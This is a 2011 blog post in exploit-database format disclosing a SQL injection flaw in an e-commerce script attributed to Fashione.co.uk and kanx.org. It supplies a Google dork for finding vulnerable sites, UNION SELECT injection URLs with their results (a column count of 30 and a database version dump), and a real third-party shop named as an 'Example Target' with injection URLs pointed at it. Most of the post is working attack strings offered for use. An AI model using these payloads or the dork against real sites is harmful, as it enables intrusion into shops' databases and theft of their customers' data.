Pages

10 November 2011

E-Commerce Fashione.co.uk & www.kanx.org [SQL Injection]

################################################################

[+] Exploit Title: E-Commerce Fashione.co.uk & www.kanx.org [SQL Injection]

[+] Google Dork: "Powered by: Fashione.co.uk" or "Ecommerce Design by www.kanx.org"

[+] Date: November 10, 2011

[+] Author: D4wFl1N

[+] Contact : D4wFl1N[at]deadc0de[dot]or[dot]id

[+] Web : http://D4wFl1N.blogspot.com

[+] Software Link: http://www.fashione.co.uk/ | http://www.kanx.org/

[+] Category: web apps [SQL Injection]

[+] Tested on: [Windows XP]

#################################################################

[+] Vulnerability :

*SQL injection Vulnerability*

http://localhost/path/index.php?page_id=dept&id=1'
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,[deadc0de],9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

http://localhost/path/index.php?page_id=brand&brandid=1
http://localhost/path/index.php?page_id=brand&brandid=1&id=1&deptid=1

[+] POC

http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

Result : 8 10 \ Page 1

Selected Column Count is 30
Valid String Column is 8 and 10


http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 5.0.92-community 10 \ Page 1

http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 5.0.92-community \ Page 1


[+] Example Target

http://www.fusionfashion.co.uk/index.php
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--


################################################################################
[+] Greets : r3d3_deadc0de, Gwe_meonkzt, p4rcomx, th3-w1tch, Dr.Cr4sh, Oghie, vim-n4n0, Avant Levithan a.k.a Bokepers :D and you

deadc0de-Team, Makassar Ethical Hacker, xCrew,nyubicrew Mildnet, irc.byroe.net
################################################################################

0 comments: